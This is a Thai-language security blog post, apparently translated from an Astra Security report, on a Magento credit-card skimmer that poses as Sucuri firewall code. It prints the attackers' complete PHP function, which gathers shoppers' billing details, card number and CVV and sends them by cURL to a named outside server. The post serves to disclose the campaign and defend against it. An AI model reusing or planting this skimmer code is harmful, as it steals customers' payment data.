ด้วยมาตรการล็อกดาวน์จากโควิด-19 และการขาย BFCM และส่วนลดคริสต์มาสที่ใกล้จะเกิดขึ้นทั่วโลก การซื้อของออนไลน์ยังคงเพิ่มขึ้นอย่างต่อเนื่องในปีนี้และควบคู่ไปกับการโจมตีด้วยสกิมเมอร์ของบัตรเครดิตดิจิทัล
ตามรายงานล่าสุดของเราเกี่ยวกับแคมเปญมัลแวร์โทรเลข นักวิจัยด้านความปลอดภัยที่ Astra Security พบแคมเปญมัลแวร์ขโมยข้อมูลบัตรเครดิตที่กำลังดำเนินอยู่ ซึ่งแอบอ้างเป็น บริษัท รักษาความปลอดภัย 'Sucuri' เพื่อขโมยข้อมูลลูกค้าที่ละเอียดอ่อนจากร้านค้าอีคอมเมิร์ซที่ติดไวรัส แม้ว่าเราจะติดตามมัลแวร์นี้ที่กำหนดเป้าหมายไปยังร้านค้า Magento แต่มีการตรวจพบร่องรอยของมัลแวร์ใน CMS อื่นๆ เช่น Prestashop, OpenCart และ WooCommerce ด้วย
การโจมตีผ่านบัตรเครดิตดิจิทัลคืออะไร
การโจมตีผ่านบัตรเครดิตดิจิทัลเป็นการโจมตีผ่านเว็บที่แฮกเกอร์แทรกโค้ด JavaScript ที่เป็นอันตรายลงในเว็บไซต์หรือร้านค้าอีคอมเมิร์ซ เพื่อติดมัลแวร์และขโมยข้อมูลประจำตัวและข้อมูลการชำระเงินที่ละเอียดอ่อนจากผู้เข้าชมเว็บไซต์/ลูกค้าในท้ายที่สุด โค้ดที่เป็นอันตรายของนักเล่นสเก็ตดิจิทัลเหล่านี้ส่วนใหญ่จะถูกฝังไว้ที่แบบฟอร์มป้อนข้อมูลของผู้ใช้ที่แสดงอยู่ในหน้าชำระเงินของไซต์ที่ดักจับข้อมูลของผู้ใช้หรือสร้าง iframe ด้วยรูปแบบการชำระเงินปลอมเพื่อขโมยข้อมูลบัตรเครดิตของลูกค้า
การเล่นผ่านข้อมูลดิจิทัลส่งผลกระทบต่อเว็บไซต์หลายแสนเว็บไซต์จนถึงปัจจุบัน ซึ่งรวมถึงแบรนด์ที่มีชื่อเสียง เช่น British Airways, Macy’s, Forbes, NewEgg และ Ticketmaster
อาการของมัลแวร์ Magento ขโมยข้อมูลบัตรเครดิต
- ลูกค้าบ่นเกี่ยวกับการทำธุรกรรมที่ไม่ระบุตัวตนจากบัตรเครดิตของพวกเขาหลังจากใช้ที่ร้านค้าของคุณ
- อีเมลจากผู้ให้บริการชำระเงิน/ธนาคารเพื่อแจ้งเตือนเกี่ยวกับความปลอดภัยของเกตเวย์การชำระเงินของร้านค้าของคุณ
- เพิ่มวิธีการชำระเงินเพิ่มเติมในร้านค้าที่คุณไม่ได้ระบุ
- โค้ดที่มีคำว่า 'Sucuri' ที่เพิ่มไว้ในเว็บไซต์ของคุณ แม้ว่าคุณจะไม่ได้ใช้ผลิตภัณฑ์ใดๆ ที่มีชื่อก็ตาม
วิธีที่แฮ็กเกอร์กำหนดเป้าหมายร้านค้าและแอบอ้างเป็นไฟร์วอลล์ Sucuri เพื่อหลอกให้ผู้ใช้แจ้งข้อมูลการชำระเงิน
ในระหว่างการวิเคราะห์แคมเปญมัลแวร์นี้ ทีมวิจัยของเราพบว่าแฮกเกอร์กำลังพยายามฝังมัลแวร์ผ่านบัตรเครดิตนี้ไว้ในเว็บไซต์อีคอมเมิร์ซ (ส่วนใหญ่เป็นร้าน Magneto) และหลอกผู้เยี่ยมชมเว็บไซต์หรือผู้ซื้อให้ป้อนข้อมูลที่ละเอียดอ่อนระหว่างการชำระเงิน รหัส Skimmer บัตรเครดิตที่เป็นอันตรายอยู่ที่ตำแหน่งไฟล์นี้ /app/code/core/Mage/Payment/Model/Method/Cc.php ของไซต์ที่ติดไวรัส
ที่นี่ผู้โจมตีกำลังเพิ่มฟังก์ชัน $this->sucuri_encrypted(); ซึ่งช่วยให้พวกเขาสามารถกรองข้อมูลที่ป้อนโดยผู้ใช้ระหว่างกระบวนการเช็คเอาต์ และข้อมูลที่ดึงออกมากำลังถูกส่งไปยัง https://www.thebrandstore.gr/js/i.php
ข้อมูลที่ถูกขโมยประกอบด้วยข้อมูลที่ละเอียดอ่อนของลูกค้า รวมถึงชื่อ นามสกุล ที่อยู่ หมายเลขโทรศัพท์ และรายละเอียดบัตรเครดิต
ด้านล่างนี้คือตัวอย่างโค้ดที่ใช้ในแคมเปญมัลแวร์นี้ที่ผู้โจมตีใช้:
function sucuri_encrypted()
{
$info = $this->getInfoInstance();
$object = new Mage_Checkout_Block_Onepage_Billing;
$address1 = $object->getQuote()->getBillingAddress();
$data1 = $address1->getFirstname();
$data2 = $address1->getLastname();
$data3 = $address1->getStreet(1);
$data4 = $address1->getStreet(2);
$data5 = $address1->getCity();
$data6 = $address1->getRegion();
$data7 = $address1->getPostcode();
$data8 = $address1->getCountry();
$data9 = $address1->getTelephone();
$data10 = $info->getCcNumber();
$expyear = substr($info->getCcExpYear(), -2);
$expmonth = $info->getCcExpMonth();
if (strlen($expmonth) == 1) {
$expmonth = '0'.$expmonth;
};
$data11 = $expmonth;
$data12 = $expyear;
$data13 = $info->getCcCid();
$data15 = $_SERVER['SERVER_NAME'];
$data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
//create array of data to be secured
$sucuri_firewall['firstname'] = base64_encode($data1);
$sucuri_firewall['lastname'] = base64_encode($data2);
$sucuri_firewall['address'] = base64_encode($data3);
$sucuri_firewall['address2'] = base64_encode($data4);
$sucuri_firewall['city'] = base64_encode($data5);
$sucuri_firewall['state'] = base64_encode($data6);
$sucuri_firewall['zip'] = base64_encode($data7);
$sucuri_firewall['country'] = base64_encode($data8);
$sucuri_firewall['phone'] = base64_encode($data9);
$sucuri_firewall['cc'] = base64_encode($data10);
$sucuri_firewall['exp'] = base64_encode($data11);
$sucuri_firewall['expyear'] = base64_encode($data12);
$sucuri_firewall['cvv'] = base64_encode($data13);
$sucuri_firewall['email'] = base64_encode($data16);
$sucuri_firewall['dari'] = base64_encode($data15);
$sucuri_firewall['submit'] = 'Submit';
//traverse array and prepare data for posting (key1=value1)
foreach ( $sucuri_firewall as $key => $value) {
$post_items[] = $key . '=' . $value;
}
//create the final string to be posted using implode()
$post_string = implode ('&', $post_items);
//create cURL connection
$curl_connection = curl_init('https://www.thebrandstore.gr/js/i.php');
//set options
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
//set data to be posted
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post_string);
//perform our request
$result = curl_exec($curl_connection);
curl_close($curl_connection);
}
}
}.
ดังที่คุณเห็นในโค้ดด้านบน ผู้ขโมยข้อมูลบัตรเครดิตได้เพิ่มฟังก์ชันชื่อ $this->sucuri_encrypted(); ซึ่งแสดงรหัสไฟร์วอลล์ Sucuri ที่ปลอมแปลง
วิธีปกป้องร้านค้าอีคอมเมิร์ซของคุณจากมัลแวร์นี้
เว็บไซต์อีคอมเมิร์ซหรือร้านค้าที่ติดมัลแวร์นี้อาจสูญเสียรายได้จำนวนมากรวมถึงความไว้วางใจของลูกค้าเนื่องจากข้อมูลที่สำคัญของลูกค้าถูกขโมยที่นี่และคำสั่งซื้อที่ถูกต้องจะไม่ได้รับหรือการชำระเงินยังไม่เสร็จสิ้น ดังนั้น ขอแนะนำสำหรับเจ้าของไซต์ว่าพวกเขาควรใช้มาตรการรักษาความปลอดภัยก่อนหน้านี้ เพื่อปกป้องไซต์และข้อมูลลูกค้าจากสกิมเมอร์บัตรเครดิตประเภทนี้และแคมเปญมัลแวร์อื่น ๆ
หากคุณกำลังใช้ไฟร์วอลล์แอปพลิเคชันของ Astra Security ร้านอีคอมเมิร์ซของคุณได้รับการปกป้องจากการโจมตีนี้แล้ว การโจมตีทางไซเบอร์และช่องโหว่อื่นๆ เช่น SQLi, XSS, CSRF, LFI, RFI, การแฮ็กบัตรเครดิต, สแปม, บอทที่ไม่ดี เป็นต้น นอกจากนี้ ผู้เชี่ยวชาญด้านความปลอดภัยแนะนำการสแกนมัลแวร์เป็นประจำว่าเป็นมาตรการรักษาความปลอดภัยที่สำคัญสำหรับความปลอดภัยของเว็บไซต์มาเป็นเวลานาน ถึงเวลาที่คุณต้องเตรียมเว็บไซต์ให้พร้อมด้วยมาตรการรักษาความปลอดภัยที่เหมาะสมเพื่อปกป้องเว็บไซต์ตลอดเวลา
